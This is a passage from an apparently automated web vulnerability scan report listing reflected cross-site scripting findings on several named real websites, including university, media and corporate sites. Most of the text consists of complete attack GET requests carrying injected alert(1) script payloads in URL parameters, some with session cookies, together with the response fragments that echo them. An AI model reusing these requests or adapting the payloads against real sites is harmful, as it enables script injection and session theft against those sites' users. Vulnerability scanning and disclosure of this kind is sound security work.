GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95937af"%3balert(1)//10c054b4a93&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... 7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95937af";alert(1)//10c054b4a93&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&desti ...[SNIP]...
The value of the unit request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be4b9"%3balert(1)//0a352431f30 was submitted in the unit parameter. This input was echoed as be4b9";alert(1)//0a352431f30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dirbe4b9"%3balert(1)//0a352431f30&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... &postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dirbe4b9";alert(1)//0a352431f30&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=no& ...[SNIP]...
The value of the user1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0112"%3balert(1)//a96fd83d2c4 was submitted in the user1 parameter. This input was echoed as f0112";alert(1)//a96fd83d2c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112"%3balert(1)//a96fd83d2c4&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... redit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112";alert(1)//a96fd83d2c4&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=no&mvtkey=D55602D1FF1E5348");
setAllowDestURLOnSubmit(true);
/* an_arr's params * 0 - poid * 1 - redirect href * 2 - has p ...[SNIP]...
The value of the user2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6d2a"%3balert(1)//193f4f335e was submitted in the user2 parameter. This input was echoed as b6d2a";alert(1)//193f4f335e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a"%3balert(1)//193f4f335e&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... litary=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a";alert(1)//193f4f335e&user3=1&user4=&user5=&clientdelivery=®istered_nurse=no&mvtkey=");
The value of the user3 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6707"%3balert(1)//1e6342d0321 was submitted in the user3 parameter. This input was echoed as f6707";alert(1)//1e6342d0321 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1f6707"%3balert(1)//1e6342d0321&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1f6707";alert(1)//1e6342d0321&user4=&user5=&clientdelivery=®istered_nurse=&mvtkey=");
The value of the version request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d898f"%3balert(1)//925ecac98bf was submitted in the version parameter. This input was echoed as d898f";alert(1)//925ecac98bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90d898f"%3balert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... 2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90d898f";alert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=no&mvtkey=D55602D1FF1E5348");
The value of the level_education request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 137ab"%3balert(1)//63ddfe10507a70ca9 was submitted in the level_education parameter. This input was echoed as 137ab";alert(1)//63ddfe10507a70ca9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the program_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 824bc"%3balert(1)//faa69d1e4cac8c868 was submitted in the program_type parameter. This input was echoed as 824bc";alert(1)//faa69d1e4cac8c868 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the program_type2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5d8f"%3balert(1)//b75aa6850b1597960 was submitted in the program_type2 parameter. This input was echoed as c5d8f";alert(1)//b75aa6850b1597960 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the registered_nurse request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e90f"%3balert(1)//35db81cf6d89d4995 was submitted in the registered_nurse parameter. This input was echoed as 2e90f";alert(1)//35db81cf6d89d4995 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the state request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b8d"%3balert(1)//b06b0eb551423d5a9 was submitted in the state parameter. This input was echoed as d2b8d";alert(1)//b06b0eb551423d5a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the language request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60c18"><script>alert(1)</script>5e11220fedb was submitted in the language parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bertelsmann_corp/wms41/bm/index.php?language=260c18"><script>alert(1)</script>5e11220fedb HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Bertelsmann - me ...[SNIP]... <a href="/bertelsmann_corp/wms41/bm/index.php?language=160c18"><script>alert(1)</script>5e11220fedb" class="meta_lang"> ...[SNIP]...
5.210. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bertelsmann.com
Path:
/bertelsmann_corp/wms41/bm/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50700"><script>alert(1)</script>e85a0f4245a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bertelsmann_corp/wms41/bm/index.php?language=2&50700"><script>alert(1)</script>e85a0f4245a=1 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Bertelsmann - me ...[SNIP]... <a href="/bertelsmann_corp/wms41/bm/index.php?language=1&50700"><script>alert(1)</script>e85a0f4245a=1" class="meta_lang"> ...[SNIP]...
5.211. http://www.bertelsmann.com/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcc66'-alert(1)-'3bff25cde7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php?stub=all&bcc66'-alert(1)-'3bff25cde7f=1 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php?language=2 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f6b6'-alert(1)-'495846e9164 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security1f6b6'-alert(1)-'495846e9164/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1 Host: www.computerworlduk.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e0f'-alert(1)-'d59c4c6d91f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability42e0f'-alert(1)-'d59c4c6d91f/?olo=rss HTTP/1.1 Host: www.computerworlduk.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
5.214. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac01a'-alert(1)-'1b0ab91431a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss&ac01a'-alert(1)-'1b0ab91431a=1 HTTP/1.1 Host: www.computerworlduk.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the olo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6016'-alert(1)-'c1d90134a6 was submitted in the olo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rssc6016'-alert(1)-'c1d90134a6 HTTP/1.1 Host: www.computerworlduk.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee62f'%3balert(1)//6bcc834eb was submitted in the from parameter. This input was echoed as ee62f';alert(1)//6bcc834eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /store?from=freemancoee62f'%3balert(1)//6bcc834eb HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <hea ...[SNIP]... t> function forgotPassword(){ var username = $("#loginName").val(); window.location.href="user/forgetPassword.jsp?username="+username; }
$(document).ready(function() { var from = 'freemancoee62f';alert(1)//6bcc834eb'; if(from == 'freemanco'){ window.location.href="/freemanco"; } }); </script> ...[SNIP]...
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb27d'%3balert(1)//6c9edc3f802 was submitted in the from parameter. This input was echoed as fb27d';alert(1)//6c9edc3f802 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store/?from=freemancofb27d'%3balert(1)//6c9edc3f802 HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <hea ...[SNIP]... t> function forgotPassword(){ var username = $("#loginName").val(); window.location.href="user/forgetPassword.jsp?username="+username; }
$(document).ready(function() { var from = 'freemancofb27d';alert(1)//6c9edc3f802'; if(from == 'freemanco'){ window.location.href="/freemanco"; } }); </script> ...[SNIP]...
The value of the _IG_CALLBACK request parameter is copied into the HTML document as plain text between tags. The payload 466b0<script>alert(1)</script>06150d728a4 was submitted in the _IG_CALLBACK parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the __EVENTVALIDATION request parameter is copied into the HTML document as plain text between tags. The payload fdc1c<script>alert(1)</script>2d43224a51b was submitted in the __EVENTVALIDATION parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0<error><&>0System.Web.HttpException (0x80004005): The state information is invalid for this page and might be corrupted. ---> System.Web.UI. ...[SNIP]... ows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 ViewState: /wEWBgK6xaDLAQLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD1azw9Rle9Oba8vY3Hs81Cmd5T+41mxr5Ld0eSlB88xQfdc1c<script>alert(1)</script>2d43224a51b ---> ...[SNIP]...
5.220. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.fusionvm.com
Path:
/FusionVM/DesktopDefault.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffd1"-alert(1)-"dabd45c1f1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FusionVM/DesktopDefault.aspx?3ffd1"-alert(1)-"dabd45c1f1a=1 HTTP/1.1 Host: www.fusionvm.com Connection: keep-alive Referer: http://www.criticalwatch.com/vulnerability-management.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
The value of the Alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73dfb"-alert(1)-"905ea5234ca was submitted in the Alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
